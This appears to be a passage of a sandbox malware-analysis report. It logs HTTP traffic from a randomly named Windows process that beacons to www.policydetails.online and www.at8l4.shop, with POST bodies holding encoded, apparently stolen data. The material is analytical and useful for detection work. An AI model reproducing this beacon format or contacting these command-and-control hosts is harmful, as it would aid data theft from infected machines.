Aug 27, 2024 17:49:05.495407104 CEST	1289	IN	Data Raw: 36 61 61 0d 0a ec 5d 59 73 e2 46 10 7e f6 bf 98 f2 d3 a6 12 85 43 ac 40 ae 0a 55 6c 96 b5 9d 90 e0 b2 58 fb 71 0b 2f 32 d8 88 a3 0c 2c e4 df e7 eb 9e 43 07 b2 30 96 d8 e2 01 1e 8c b0 46 3d 87 a6 e7 eb 6b 7a 74 d9 e8 6f 79 4d 77 12 e2 cf 02 09 7c Data Ascii: 6aa]YsF~C@UlXq/2,C0F=kztoyMw\|"YPM13`pY(PLLZ41x$!"K"YQpHj[pNda:YTRz`1yLI?JIPA=d)lq .PexQUkd.r 3,
Aug 27, 2024 17:49:05.495419025 CEST	424	IN	Data Raw: 69 de 1f e0 84 ab a9 85 dd 0d 63 c4 0a 4c 9e 36 7b 2b 20 1d aa 43 74 a8 0e 03 21 9f 54 5d a2 83 ba c4 87 90 13 28 34 46 b4 b8 4e f1 05 75 8a 5b aa f3 97 6c 9c b1 0f 82 33 f5 c2 70 86 29 e5 c6 99 3a e3 0c 0e 72 e3 d5 37 af 8a 52 57 38 23 d7 f2 bc Data Ascii: icL6{+ Ct!T](4FNu[l3p):r7RW8#8S#8O}5Z~)f5 fTNxaj[`SB\A8^VV{#]>/^Y-lod-kET-jN"<YK6zP)FFPg3ETn.4*p~;g
Aug 27, 2024 17:49:05.507567883 CEST	989	IN	Data Raw: 33 64 36 0d 0a ed 5d 5d 6f d3 30 14 7d e7 57 64 91 86 40 62 84 55 d0 31 56 2a 05 2a 04 52 b7 4a b0 c2 c3 3a a1 34 69 60 a8 1f 28 a1 4c 7d e0 bf ef 5c 5f 7f 26 59 db 91 76 02 a9 7b 58 d2 da f1 75 13 db d7 76 ce 39 f7 ff 78 b7 45 2b b3 29 c5 88 bd Data Ascii: 3d6]]o0}Wd@bU1V**RJ:4i`(L}\_&Yv{Xuv9xE+)a9KvVP(~c."DyA;c}D(3hdz A0=olc=M8>?X]L&\flmmYO{-tdkvvpy
Aug 27, 2024 17:49:05.507898092 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.11.20	49842	148.135.49.178	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:05.940876007 CEST	1289	OUT	POST /w4ze/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.policydetails.online Origin: http://www.policydetails.online Referer: http://www.policydetails.online/w4ze/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 51 32 68 4e 72 48 66 32 33 65 4c 33 5a 43 52 41 61 6c 32 33 57 36 66 73 4c 4c 37 71 33 63 31 71 6f 6e 72 6a 63 30 30 36 35 4e 36 49 48 6b 4a 73 72 77 35 6c 39 49 63 38 6f 2f 74 67 43 30 6a 6e 43 48 66 41 30 6e 75 62 39 68 55 41 73 65 75 58 31 77 52 58 63 6f 6a 63 2b 6a 2b 64 43 46 35 35 30 57 67 44 4d 45 69 46 37 46 67 76 39 55 37 47 78 77 4e 33 35 6c 6e 4a 76 48 35 51 33 69 44 6b 6c 6b 39 6d 61 64 30 7a 62 49 6b 2f 46 70 43 4b 6a 57 6a 46 2f 64 58 55 44 65 67 41 76 6a 77 76 4e 32 42 74 78 69 57 41 46 58 30 54 42 69 6d 78 65 41 4c 52 45 71 39 6e 59 46 63 37 30 45 75 69 79 4f 4f 66 6e 69 31 61 52 31 57 37 68 74 2b 74 2b 58 45 30 4c 63 78 41 31 33 56 75 63 2b 7a 6d 63 4e 2b 4a 55 31 67 37 2b 6c 41 69 46 78 4e 75 6d 6b 68 61 61 61 41 57 46 74 48 74 62 43 55 36 59 2b 4a 69 50 76 69 63 58 68 62 71 39 76 33 76 45 34 77 53 75 6e 63 32 39 58 62 45 79 45 6e 58 4e 65 48 33 48 46 6f 53 4e 55 77 62 76 68 38 64 4e 65 4f 43 73 32 62 61 70 51 6f 52 55 52 74 5a 48 57 43 53 76 54 68 4c 34 [TRUNCATED] Data Ascii: AvLLLbOh=Q2hNrHf23eL3ZCRAal23W6fsLL7q3c1qonrjc0065N6IHkJsrw5l9Ic8o/tgC0jnCHfA0nub9hUAseuX1wRXcojc+j+dCF550WgDMEiF7Fgv9U7GxwN35lnJvH5Q3iDklk9mad0zbIk/FpCKjWjF/dXUDegAvjwvN2BtxiWAFX0TBimxeALREq9nYFc70EuiyOOfni1aR1W7ht+t+XE0LcxA13Vuc+zmcN+JU1g7+lAiFxNumkhaaaAWFtHtbCU6Y+JiPvicXhbq9v3vE4wSunc29XbEyEnXNeH3HFoSNUwbvh8dNeOCs2bapQoRURtZHWCSvThL4NY2MyDS96ZsjZXs/Ew3C2El0RXqGACorPJZf1PFq09j8Gx0oTmiYD9Vfo7NpYo6yvvTl7q1gNFp/U7ClGn4wbqtTEp+LFQxO5lQgP3EdaCZmsU2u5q3sZhnU6oylUr7ccryooi4FzCK1jSAhjK/gy5rDiDaA8Y49lc7HcV9P11BInnZ5GLVYhmIRk1DDUvcRk1ZD6VtONqWOzaoMRxpGJENYkKvN4P8NDyTDkRH5Q0Gsey53EDb9Y+LCn2PyqSXWuDjfGlnEIUBIjusPE1n9sB4gHn2dRmVO3e6Bx62+c3Uqfyi16D7vDdrcWRwCqz57Kbujcd6CYCsFREvR1VHmWb
Aug 27, 2024 17:49:05.940927029 CEST	5156	OUT	Data Raw: 6e 77 41 4b 4d 76 77 6e 37 7a 51 64 59 6d 2f 59 67 48 6d 54 68 45 52 2b 50 47 4e 79 30 32 38 63 69 41 54 70 66 75 55 57 6f 45 47 45 31 76 2f 4b 74 73 6c 54 78 78 6b 4c 7a 52 37 48 77 78 65 54 4a 77 4b 44 45 6a 56 50 35 79 51 75 32 4e 42 44 4e 55 Data Ascii: nwAKMvwn7zQdYm/YgHmThER+PGNy028ciATpfuUWoEGE1v/KtslTxxkLzR7HwxeTJwKDEjVP5yQu2NBDNUYtAtWCouJz1RCKtcjggH9n8z0KZgMBLBOFHDYCGVWRg4TeNbqYKhhfpm/RsZanlIP3rt4oPbEep3N1xJo/vp/4+xFgPl3pvBjNOXG65hrSWqrSnlpNet+CTjvwkG0IDIiRrlRRgi73NRos0iD53/qtOTVWJpq57im
Aug 27, 2024 17:49:05.940974951 CEST	6445	OUT	Data Raw: 34 35 67 75 35 6f 4b 69 68 51 55 64 44 56 47 6c 36 47 46 58 43 63 33 4b 76 6c 4d 4f 6e 30 39 50 38 71 4e 58 67 31 6d 6e 2b 64 78 4d 53 73 62 65 45 44 48 71 4a 77 62 50 67 52 42 79 62 75 63 4c 31 30 6e 6c 68 41 57 41 44 79 50 69 64 73 4c 6a 4a 78 Data Ascii: 45gu5oKihQUdDVGl6GFXCc3KvlMOn09P8qNXg1mn+dxMSsbeEDHqJwbPgRBybucL10nlhAWADyPidsLjJxFITDAKhDmxw//63D0TxdVdLj0GkTdKK2bgzVvfbfX24qpj+15035TX0YLdztAmw2wI2RcsYK7SkSNhYF3K9TSKxwyYAixEBk/6axxzQ1Ye64hCOh0Q6T6w1xPesZdLuNCuUe0QwxtFvK9jiMs9vxW0P7W0WV/nnGg
Aug 27, 2024 17:49:06.103986979 CEST	2578	OUT	Data Raw: 4d 56 53 6d 68 78 58 67 53 5a 30 6a 4e 52 46 38 57 50 65 6c 37 76 4d 4f 43 32 51 46 4c 48 48 48 63 56 4a 55 33 62 65 4b 6d 53 49 68 4e 43 36 37 7a 70 71 33 38 4b 64 34 71 2f 52 56 7a 63 6a 65 43 32 33 79 33 4b 73 2b 33 4b 57 56 46 6c 30 49 6e 6d Data Ascii: MVSmhxXgSZ0jNRF8WPel7vMOC2QFLHHHcVJU3beKmSIhNC67zpq38Kd4q/RVzcjeC23y3Ks+3KWVFl0InmtF4g5Krb/dBED0N9qwfIUrPZ9IWR4KoefOG/W5MPX5CCTb3Te6GOl+zxDuaJx0j7K8tEegNKmQO+1IaK93K+81aBq1iJIpxU3S3jF9nFwB9SuPVET0ZA5zeN28U6Q/gSSoiMqMPHldWSm316F8kRC6pf64WaoHsNG
Aug 27, 2024 17:49:06.104172945 CEST	1289	OUT	Data Raw: 6a 67 46 37 59 66 73 38 65 54 4d 6f 51 6d 63 30 30 66 52 36 64 38 2b 4c 6e 62 72 51 54 35 6e 2f 68 49 44 79 4a 39 54 79 6d 38 75 31 7a 45 67 59 6d 6a 6d 68 4a 48 46 61 32 64 6f 51 42 39 72 4e 53 74 51 2b 37 59 7a 63 37 4e 4b 4a 46 75 45 42 61 51 Data Ascii: jgF7Yfs8eTMoQmc00fR6d8+LnbrQT5n/hIDyJ9Tym8u1zEgYmjmhJHFa2doQB9rNStQ+7Yzc7NKJFuEBaQT9zUbxT8UK7QkYEk4Iw6kSZh11h2CO+u7e04uFOGGoq8so2OCwEl/7Yymkmege6gyAxmGhKxNMmER3re2B7S9neXGt3FW1iUP5UMRKI8PXPuLmCk+k77nVKyhN2widSlHQNH8zFHlOjlhe1oycGJJBv1HApDzADB8
Aug 27, 2024 17:49:06.104343891 CEST	16757	OUT	Data Raw: 52 57 33 35 44 73 4f 57 6d 67 4c 4f 72 6b 59 56 79 46 69 39 33 31 6b 65 68 33 68 51 6b 32 78 44 46 48 34 6f 6d 61 74 38 58 53 5a 70 79 76 46 62 64 52 6d 2b 49 48 6d 68 67 36 47 37 30 4d 42 32 61 6c 70 46 5a 52 78 37 73 47 4d 62 74 56 32 77 35 42 Data Ascii: RW35DsOWmgLOrkYVyFi931keh3hQk2xDFH4omat8XSZpyvFbdRm+IHmhg6G70MB2alpFZRx7sGMbtV2w5BCB3qjpo3ekSg37py1wDW+noeY7i+9tuNRGN/a1Nnn5tC0iiW0s6O5WI5XzX0hGLSzSnbp5EGy/+yqEKkTUWbFkKgTIV4Ljr5D659L1i9gF8RSX43TLXG04W3asyL2NMQlQb2l2zJ8XASQQJjhIIb5Nk+FQsHtrdKq
Aug 27, 2024 17:49:06.104682922 CEST	3867	OUT	Data Raw: 38 76 47 63 62 2b 73 4b 64 50 73 64 4a 46 38 44 65 6b 55 41 49 37 2b 42 71 51 48 51 44 73 5a 4a 66 45 78 6b 53 57 76 38 48 53 38 48 67 7a 6d 5a 61 72 62 61 45 50 65 53 30 65 74 39 49 4c 35 59 75 61 32 51 6b 62 62 4f 6d 6c 2f 32 39 6c 6c 50 37 42 Data Ascii: 8vGcb+sKdPsdJF8DekUAI7+BqQHQDsZJfExkSWv8HS8HgzmZarbaEPeS0et9IL5Yua2QkbbOml/29llP7BbGgCxcOTW6ofLrud3bTPXc6Se6qKHISSBrY/xOKexfKJO+odj4ovVXhXyOdaSs6kzxYbNB168B528qhds6pKHLWoh+afUnzNoOeTB1Jkoh6CdEEpf+QmRUYAySLk9cCDoEMb4NRU3XIR5iMdIPnIKxO8M8QWLFUW3
Aug 27, 2024 17:49:06.104851007 CEST	1289	OUT	Data Raw: 66 52 39 51 45 46 75 53 49 39 7a 46 71 68 33 66 6e 57 43 52 4f 35 37 59 31 4f 52 73 54 46 31 46 30 37 4b 4a 7a 47 75 75 72 4e 48 64 7a 6f 52 4b 5a 50 4b 76 74 4f 6c 6a 6f 33 33 65 4c 2f 53 49 31 41 62 34 66 35 33 64 48 43 58 44 43 7a 51 52 5a 4f Data Ascii: fR9QEFuSI9zFqh3fnWCRO57Y1ORsTF1F07KJzGuurNHdzoRKZPKvtOljo33eL/SI1Ab4f53dHCXDCzQRZOVQW5mFOrd1IFSeo/amnVx0si+1TmvjVQ5q5FlG8rtwheEtMPFgXv5jdt3YUWvkBz3g7dqGBf0jVeqPla6Z7d8cRiPqlVJF/xx9PfstHYitWbJFUYexZ6fydVkVmHEvvP09wrgtpUA00TcAYpihNfSa9HD3Hchcizw
Aug 27, 2024 17:49:06.267389059 CEST	1289	OUT	Data Raw: 4f 44 79 42 55 4a 63 6a 79 75 57 38 31 59 6a 68 68 67 57 79 5a 49 37 67 45 48 5a 50 36 46 36 74 76 35 79 73 4b 59 64 2f 32 70 48 69 53 63 49 66 4c 57 62 6a 4d 77 75 43 38 43 68 35 77 4e 4e 48 79 7a 32 6f 5a 38 59 4b 68 66 6b 47 46 70 45 49 31 68 Data Ascii: ODyBUJcjyuW81YjhhgWyZI7gEHZP6F6tv5ysKYd/2pHiScIfLWbjMwuC8Ch5wNNHyz2oZ8YKhfkGFpEI1hHlrCOr1tnu1wIwxd8JzFuHKcgt+g3s7xiY0oluf4z5Bi1Uu/Nc41hk7tpajdctLNCOJY33sDR8JlaPK6q8laDSLJFxjZyN98um0aAsAVT4It0DSWuFdHosKtK1Q26s2uOHZSsjfwbfSMiB1BikSa5yao0yS34Ibx7
Aug 27, 2024 17:49:06.267436981 CEST	1289	OUT	Data Raw: 69 63 58 68 50 6a 73 67 50 52 72 2f 78 48 47 39 2f 31 46 55 41 47 67 58 75 50 72 4d 4c 35 31 72 45 54 5a 69 55 43 4c 32 4e 78 70 71 2f 33 51 6a 79 37 37 37 4a 37 6e 46 51 2f 6c 6f 70 5a 50 77 50 6e 2b 43 67 55 7a 55 7a 38 39 52 68 49 67 69 37 4c Data Ascii: icXhPjsgPRr/xHG9/1FUAGgXuPrML51rETZiUCL2Nxpq/3Qjy777J7nFQ/lopZPwPn+CgUzUz89RhIgi7LbMT5alSc1VuipnijeVb5ALLm6+iDlFiQwPHVRELXccZhJ/m4txGDKdHq59b7nxiJdOgLo7NZ7qtqao/WSRt8neit236zXiymhmZoVOm2uHwyD5Et1z47RhAW00Vz4NDzcb3lNIFxz4S5bZjnO4bQyiuy7otmI/m3k
Aug 27, 2024 17:49:06.267836094 CEST	12294	OUT	Data Raw: 67 52 50 48 47 58 64 2f 71 32 31 54 67 50 76 77 66 2b 44 55 57 46 57 63 2f 42 38 41 55 77 61 70 69 75 35 69 41 59 68 67 49 61 6f 64 75 61 42 65 2b 41 55 41 77 37 30 52 4d 43 6e 35 45 66 4a 6d 58 50 53 32 36 56 4c 50 6a 38 73 38 33 4d 4e 4b 4a 58 Data Ascii: gRPHGXd/q21TgPvwf+DUWFWc/B8AUwapiu5iAYhgIaoduaBe+AUAw70RMCn5EfJmXPS26VLPj8s83MNKJXmawLchVIYsoIn8AYXvEbSJi/vJd4p7GvkQByWY8ximX/MRKq8StIfq8e3Asn1+ccIKDNvUyMJfCTo4yXEpOx1MYav9Xg/dmrMrmbmsnxWGPB1tHcb9Yl7IIgvdiZ98cyslmGEbJWEEp0eWdFIqTltUZQXglnj/EQL
Aug 27, 2024 17:49:07.268532991 CEST	1289	IN	HTTP/1.1 404 Not Found Connection: close x-powered-by: PHP/8.1.29 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://policydetails.online/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked content-encoding: gzip vary: Accept-Encoding date: Tue, 27 Aug 2024 15:49:07 GMT server: LiteSpeed Data Raw: 65 39 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 5b fb 73 9b 48 12 fe 79 5d 75 ff 03 26 b5 36 6c 00 01 7a 4b 26 a9 6c 92 bd da ab bd cb d6 26 a9 fb 21 4e a5 10 0c 12 09 02 96 87 6d 9d a2 ff fd be 19 9e c2 e8 61 29 a9 58 11 43 77 7f 3d 3d 3d fd 98 71 6e 2e ed c0 4a 56 21 e1 16 c9 d2 e3 5e fc e3 e2 e6 52 96 3f b9 0e f7 fb 5b 6e f4 f9 05 87 3f 37 ec 95 e5 99 71 6c f0 2e 19 f1 9c 67 fa 73 83 27 3e ff 82 bb b9 fc 44 7c db 75 3e cb f2 36 f3 b8 95 79 7c 04 f3 3c c9 c1 a9 2a 40 60 f0 05 a4 fc f1 3d 43 95 e5 06 f2 82 98 36 34 60 0a 2f 49 62 72 d6 c2 8c 62 92 18 fc c7 0f bf c9 50 ba b3 f5 d6 37 97 c4 e0 ef 5c 72 1f 06 51 c2 73 56 e0 27 c4 07 f5 bd 6b 27 0b c3 26 77 ae 45 64 f6 20 71 ae ef 26 ae e9 c9 b1 65 7a c4 d0 14 95 2f 64 79 ae ff 8d 8b 88 67 f0 a1 eb cf 67 a6 f5 8d e7 16 11 71 0c 7e 91 24 e1 a4 d3 09 03 cf b5 56 36 14 72 bd 58 09 7c 30 90 ce c3 d2 8b 42 4b 09 17 61 4d ad c4 4d 3c f2 e2 4f 73 4e 38 3f 48 38 27 48 7d 9b bb 7a 36 d2 35 6d ca fd ee c7 69 64 fa 16 e1 fe 64 02 b9 37 99 c4 9b 4e c6 76 71 53 6a [TRUNCATED] Data Ascii: e93[sHy]u&6lzK&l&!Nma)XCw===qn.JV!^R?[n?7ql.gs'>D\|u>6y\|<*@`=C64`/IbrbP7\rQsV'k'&wEd q&ez/dyggq~$V6rX\|0BKaMM<OsN8?H8'H}z65midd7NvqSjrmBXLvEa0\|BWF_"~O/{{}HW=IL=n\|<~On;XWh~q[\|vmG+~%_9i@\|4?YXqLL[^j\|'t}kD@(LaK949IhI}+q_p%_\HD8gD\'Kug?8'DJ%p"{rgz)yf8IHz?JDX=Y(n`kA6>AU#F+TIlp%%E"=f}zUqJ'TtWQdun#ZA(JuNFF$I#K'Xu}J>oiaOQTWUswr[%t+`AH%"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.11.20	49843	148.135.49.178	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:08.639863968 CEST	533	OUT	GET /w4ze/?7RB=66nPyLG8&AvLLLbOh=d0Jtowaj2cDKdGl/ZWixKoK2UJz0xOtSqBjDY2hG4a3QahhJ7y0n5KAnu51LUWnaBzfk1RzCzkwasvfXjgFxQ6WD3nD/I11dyUYYEHS/n2QZzV395iZlwCs= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.policydetails.online Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Aug 27, 2024 17:49:09.210969925 CEST	501	IN	HTTP/1.1 301 Moved Permanently Connection: close x-powered-by: PHP/8.1.29 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 x-redirect-by: WordPress location: http://policydetails.online/w4ze/?7RB=66nPyLG8&AvLLLbOh=d0Jtowaj2cDKdGl/ZWixKoK2UJz0xOtSqBjDY2hG4a3QahhJ7y0n5KAnu51LUWnaBzfk1RzCzkwasvfXjgFxQ6WD3nD/I11dyUYYEHS/n2QZzV395iZlwCs= content-length: 0 date: Tue, 27 Aug 2024 15:49:09 GMT server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.11.20	49844	3.33.130.190	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:22.618396044 CEST	782	OUT	POST /euco/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.at8l4.shop Origin: http://www.at8l4.shop Referer: http://www.at8l4.shop/euco/ Content-Length: 205 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 4c 4e 6f 68 63 77 38 65 4e 32 2b 33 79 48 39 46 2f 32 68 6a 64 4f 51 63 32 73 4f 58 78 45 39 69 4c 5a 7a 44 63 71 48 50 2f 44 47 34 5a 78 37 7a 47 6e 67 69 4a 70 45 56 35 65 69 51 66 53 52 34 34 64 32 46 75 6f 5a 6e 32 37 67 32 76 49 58 5a 34 35 68 65 58 4b 30 42 6a 62 31 2f 77 66 43 78 66 58 59 6e 4f 41 6a 56 71 30 6f 44 36 70 43 6b 51 52 50 57 41 68 73 43 41 45 79 48 46 69 32 38 6e 36 37 6f 57 74 46 78 43 4b 65 54 53 7a 47 67 77 51 44 6b 68 6b 59 33 2b 77 52 33 66 7a 67 6e 46 37 45 66 55 4d 44 36 79 37 6c 73 74 67 54 34 73 4b 32 6e 49 58 45 43 65 54 42 62 73 35 58 56 4d 67 3d 3d Data Ascii: AvLLLbOh=LNohcw8eN2+3yH9F/2hjdOQc2sOXxE9iLZzDcqHP/DG4Zx7zGngiJpEV5eiQfSR44d2FuoZn27g2vIXZ45heXK0Bjb1/wfCxfXYnOAjVq0oD6pCkQRPWAhsCAEyHFi28n67oWtFxCKeTSzGgwQDkhkY3+wR3fzgnF7EfUMD6y7lstgT4sK2nIXECeTBbs5XVMg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.11.20	49845	3.33.130.190	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:25.256726027 CEST	1122	OUT	POST /euco/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.at8l4.shop Origin: http://www.at8l4.shop Referer: http://www.at8l4.shop/euco/ Content-Length: 545 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 4c 4e 6f 68 63 77 38 65 4e 32 2b 33 7a 6e 74 46 39 56 35 6a 61 75 51 62 35 4d 4f 58 37 6b 39 6d 4c 5a 2f 44 63 75 66 35 2f 78 79 34 61 51 4c 7a 48 69 41 69 4b 70 45 56 32 2b 6a 62 42 69 51 30 34 64 37 34 75 70 6c 6e 32 34 63 32 75 39 44 5a 70 70 68 64 64 71 30 4f 6b 62 31 79 37 2f 43 6e 66 58 63 56 4f 46 4c 56 71 6b 4d 44 39 72 71 6b 42 31 6a 56 45 42 73 4d 52 55 79 59 4c 79 32 2b 6e 39 7a 67 57 73 4d 45 43 35 43 54 54 54 6d 67 7a 51 44 6e 34 6b 59 4b 6d 41 51 55 53 53 42 30 46 37 49 66 46 39 7a 35 30 5a 5a 43 74 53 50 65 30 61 57 6c 61 48 45 6f 56 77 73 62 2f 4b 69 72 54 46 46 68 54 51 49 58 50 47 6b 37 57 69 74 6d 49 6c 6f 71 4f 61 34 4e 49 62 44 62 51 36 67 42 50 58 38 39 54 75 54 53 55 57 4f 64 44 54 30 48 76 7a 68 4b 61 76 59 6a 62 6e 6a 46 62 39 4e 37 4a 75 47 70 62 6f 43 74 35 4a 50 4c 65 4a 55 71 73 6f 64 2b 66 61 64 65 47 4f 59 2b 68 52 70 4c 4d 64 38 71 56 32 49 55 5a 58 34 78 50 71 6a 35 79 78 50 54 56 55 64 51 6a 73 2b 6d 46 74 34 31 65 38 6f 2f 66 36 78 4d 6e [TRUNCATED] Data Ascii: AvLLLbOh=LNohcw8eN2+3zntF9V5jauQb5MOX7k9mLZ/Dcuf5/xy4aQLzHiAiKpEV2+jbBiQ04d74upln24c2u9DZpphddq0Okb1y7/CnfXcVOFLVqkMD9rqkB1jVEBsMRUyYLy2+n9zgWsMEC5CTTTmgzQDn4kYKmAQUSSB0F7IfF9z50ZZCtSPe0aWlaHEoVwsb/KirTFFhTQIXPGk7WitmIloqOa4NIbDbQ6gBPX89TuTSUWOdDT0HvzhKavYjbnjFb9N7JuGpboCt5JPLeJUqsod+fadeGOY+hRpLMd8qV2IUZX4xPqj5yxPTVUdQjs+mFt41e8o/f6xMngUzMhpVk1Vmb6eYE5PX7Z1/ueWTfXDKEuUhZ5aWckhKz1/MSpT5nhPjw9940/GyPd3spbiUlIH3+t+xVmVWEua27OEt1Gj540x+p9bAJKU+yTsPOMgdOxikC0w+ng81eScSuSvqZt9+3TFRb5Y4TI9DFTK3zRyVVEuxFWhvR3LroWtwe/8fzjQvEpqV1SQYS1CBUARwMw7bK2A=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.11.20	49846	3.33.130.190	80	5096	C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:49:27.889471054 CEST	2578	OUT	POST /euco/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US Host: www.at8l4.shop Origin: http://www.at8l4.shop Referer: http://www.at8l4.shop/euco/ Content-Length: 52933 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36 Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 4c 4e 6f 68 63 77 38 65 4e 32 2b 33 7a 6e 74 46 39 56 35 6a 61 75 51 62 35 4d 4f 58 37 6b 39 6d 4c 5a 2f 44 63 75 66 35 2f 78 71 34 5a 69 54 7a 47 45 49 69 46 4a 45 56 37 65 6a 59 42 69 52 75 34 64 7a 38 75 70 70 52 32 2b 51 32 76 73 54 5a 38 50 64 64 59 71 30 50 6f 37 31 38 77 66 43 56 66 58 5a 53 4f 42 69 69 71 30 51 44 36 72 61 6b 51 30 6a 57 62 68 73 43 52 55 79 45 42 69 32 41 6e 38 6a 57 57 73 77 45 43 36 6d 54 54 68 4f 67 78 6a 62 6e 67 6b 59 4a 76 67 51 62 59 79 42 37 46 2f 6f 74 46 39 7a 44 30 62 31 43 74 53 76 65 6c 71 71 71 5a 6e 45 6f 59 51 73 59 70 4c 65 76 54 46 59 38 54 51 51 58 50 47 4d 37 55 43 74 6d 4d 30 6f 74 44 71 34 48 4d 62 44 79 62 61 38 5a 50 52 51 70 54 75 33 53 55 47 61 64 43 67 63 48 2f 67 35 4b 54 76 59 74 47 58 6a 61 51 64 4e 2f 4a 74 2f 47 62 6f 69 62 35 4a 37 4c 66 70 30 71 70 4a 64 35 53 71 64 55 4d 75 59 52 6c 52 73 4b 4d 64 74 7a 56 32 49 2b 5a 57 38 78 50 61 54 35 7a 77 50 51 55 6b 63 35 32 63 2b 33 50 4e 45 4a 65 34 77 33 66 2f 78 63 6e [TRUNCATED] Data Ascii: AvLLLbOh=LNohcw8eN2+3zntF9V5jauQb5MOX7k9mLZ/Dcuf5/xq4ZiTzGEIiFJEV7ejYBiRu4dz8uppR2+Q2vsTZ8PddYq0Po718wfCVfXZSOBiiq0QD6rakQ0jWbhsCRUyEBi2An8jWWswEC6mTThOgxjbngkYJvgQbYyB7F/otF9zD0b1CtSvelqqqZnEoYQsYpLevTFY8TQQXPGM7UCtmM0otDq4HMbDyba8ZPRQpTu3SUGadCgcH/g5KTvYtGXjaQdN/Jt/Gboib5J7Lfp0qpJd5SqdUMuYRlRsKMdtzV2I+ZW8xPaT5zwPQUkc52c+3PNEJe4w3f/xcnjYzKxpVv2t5MaefNZP7lp1ouebCfS7FFfohapKWY0hJhl/2bJTzjhPjw9xK0/KyPMPsorSUu7f3ud/bVmUNEuWz7OMH1Dqu43d+wMLAKOA/2jsKKMgKARmzCwQ2nhALeFsStS/qdt9x8TFKMJYqXIxlFTXKzR2FVE2xBxIpLn/m30thX9437y4QJ5um0wYwbTmRfSBNWzbqXyPZ25FV9kop1cSFFyGjfCbJ6ufGPgIGDJFlD0NIQ3NYVxrG8O72YddqIQvKQ2aPpNiuIF+CPssVx6GSzJ8HSBnYyH9wztTlN7WxUs+3JDNrolHARHWkzM5HAzsfwqIiBCGkASYsWV/kfG6Mcn2HbPiXEMixZ/pQozhmIDRmiDMSOQyI2H0RT6jacJsvHjTY0d5NtYXj5JNqDTatcpV158J8KYatE+nPlRmczV0N1J6Pv5e5wUlQkYfDhGVIwH/388SBa3JBjNgbpPOka0iaSaeXOPqbmDrcMRf4xRUwVvMSN2OnobKpK3u9u+nc1xyXH7gRXfDGqxFdO+S3qRn/k3h4aG8Y2a